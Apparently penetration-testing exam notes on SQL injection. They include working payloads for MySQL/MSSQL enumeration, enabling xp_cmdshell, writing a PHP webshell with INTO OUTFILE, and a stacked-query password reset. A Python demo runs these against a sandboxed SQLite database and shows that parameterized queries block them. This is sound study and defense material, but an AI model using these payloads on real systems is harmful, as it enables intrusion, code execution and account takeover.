SQL Injection
SQL Enumeration
- System user (MySQL): select system_user()
- Version: select version() (MySQL) / SELECT @@version; (MySQL and MSSQL)
- Other users (MySQL): SELECT * FROM mysql.user
- Database names (MSSQL; sys.databases lists databases, not tables): SELECT name FROM sys.databases;
Connect to MSSQL with impacket (Windows Auth):
impacket-mssqlclient $USERNAME:$PASSWORD@$IP -windows-auth
Enable xp_cmdshell (MSSQL; sp_configure needs sysadmin/serveradmin rights) - RCE:
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
UNION BASED SQLI + PHP RCE (MySQL):
' UNION SELECT '<?php system($_GET["cmd"]);?>', null, null, null, null INTO OUTFILE '/var/www/html/tmp/webshell.php' -- //
- adjust the number of NULLs to match the column count of the original query (find it with ORDER BY n / UNION SELECT NULL,...). Writing the file needs the FILE privilege, a secure_file_priv setting that does not block the target directory, and a directory the MySQL service account can write to.
curl "http://IP/tmp/webshell.php?cmd=id"
Update records of login portal (stacked queries):
'; update users set password_hash = '6183c9c42758fa0e16509b384e2c92c8a21263afa49e057609e3a7fb0e8e5ebb' where username = 'butch';--
The value is the SHA2 (SHA-256) hash of the password "tacos123"; the hash must be in whatever format the application uses to verify logins, so compute it yourself for the target's algorithm.
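Added example (not code from these notes or from any course material): the UNION column-count probing and data extraction from the section above, and the stacked-query password reset, reproduced against an in-memory SQLite database. SQLite stands in for MySQL/MSSQL, so the INTO OUTFILE step is left out; the users table, its rows, the vulnerable search/login functions and the run_batch helper that emulates a driver accepting stacked statements are all constructed here for the demo. The SHA-256 of "tacos123" is computed at runtime rather than copied from the notes.

```python
import hashlib
import sqlite3

# Constructed sample data standing in for the target's users table.
USERS = [
    ("admin", hashlib.sha256(b"correct horse").hexdigest(), "admin", "admin@example.com"),
    ("butch", hashlib.sha256(b"hunter2").hexdigest(), "user", "butch@example.com"),
]


def fresh_db():
    """In-memory SQLite DB shaped like the login portal's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password_hash TEXT, role TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (username, password_hash, role, email) "
                     "VALUES (?, ?, ?, ?)", USERS)
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """Deliberately vulnerable search: input is concatenated into the query."""
    query = f"SELECT id, username, role, email FROM users WHERE username LIKE '%{term}%'"
    return conn.execute(query).fetchall()


def find_column_count(search, max_cols=10):
    """Append UNION SELECT NULL, NULL, ... with a growing NULL count until the
    database stops complaining about mismatched column counts."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        try:
            search(f"nomatch' UNION SELECT {nulls} -- ")
            return n
        except sqlite3.OperationalError:  # column count mismatch
            continue
    return None


def dump_hashes(search, n_cols):
    """Pull username/password_hash through the UNION once the column count is
    known; 'nomatch' keeps the original WHERE from returning rows of its own."""
    cols = ["NULL"] * n_cols
    cols[0], cols[1] = "username", "password_hash"
    rows = search(f"nomatch' UNION SELECT {', '.join(cols)} FROM users -- ")
    return {row[0]: row[1] for row in rows}


def run_batch(conn, sql):
    """Emulate a driver that accepts stacked statements (an MSSQL batch, or
    MySQL with multi-statements enabled): run every ';'-separated statement and
    return the rows of the first. Splitting on ';' is a demo simplification;
    a trailing '--' fragment is dropped, as a comment would be."""
    statements = [s.strip() for s in sql.split(";")]
    statements = [s for s in statements if s and not s.startswith("--")]
    rows = conn.execute(statements[0]).fetchall()
    for stmt in statements[1:]:
        conn.execute(stmt)
    conn.commit()
    return rows


def login_vulnerable(conn, username, password):
    """Deliberately vulnerable login: string-built query sent as a batch."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password_hash = '{pw_hash}'")
    return len(run_batch(conn, query)) > 0


def login_safe(conn, username, password):
    """Hardened login: bound parameters, so input can never become SQL."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    rows = conn.execute("SELECT username FROM users WHERE username = ? AND password_hash = ?",
                        (username, pw_hash)).fetchall()
    return len(rows) > 0


def stacked_password_reset(login, new_password, victim="butch"):
    """Build the stacked-query payload from the notes with a freshly computed
    SHA-256 and submit it as the username; returns the hash that should now be stored."""
    new_hash = hashlib.sha256(new_password.encode()).hexdigest()
    payload = (f"'; update users set password_hash = '{new_hash}' "
               f"where username = '{victim}';--")
    login(payload, "anything")
    return new_hash


def stored_hash(conn, username):
    """Read a user's hash directly (safely) to check what the injection did."""
    row = conn.execute("SELECT password_hash FROM users WHERE username = ?", (username,)).fetchone()
    return row[0]


if __name__ == "__main__":
    conn = fresh_db()
    search = lambda t: search_vulnerable(conn, t)
    n = find_column_count(search)
    print("column count:", n, "leaked:", dump_hashes(search, n))
    stacked_password_reset(lambda u, p: login_vulnerable(conn, u, p), "tacos123")
    print("butch now logs in with tacos123:", login_vulnerable(conn, "butch", "tacos123"))
    safe = fresh_db()
    stacked_password_reset(lambda u, p: login_safe(safe, u, p), "tacos123")
    print("parameterized login left butch's hash alone:", stored_hash(safe, "butch") == USERS[1][1])
```

The probe loop is the same thing the manual ORDER BY / UNION SELECT NULL dance does; on MySQL or MSSQL swap sqlite3.OperationalError for the driver's error class and the rest carries over. Against the parameterized login the same payload is just a (non-matching) username string, which is the whole point of the fix.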
SQLMAP
not allowed for the exam
sqlmap -u URL --data "POST_DATA" [--technique TECHNIQUES -p PARAMETER_THAT_IS_INJECTABLE]
(--data switches to POST; -p limits testing to the named parameter; --technique picks e.g. U for UNION, S for stacked)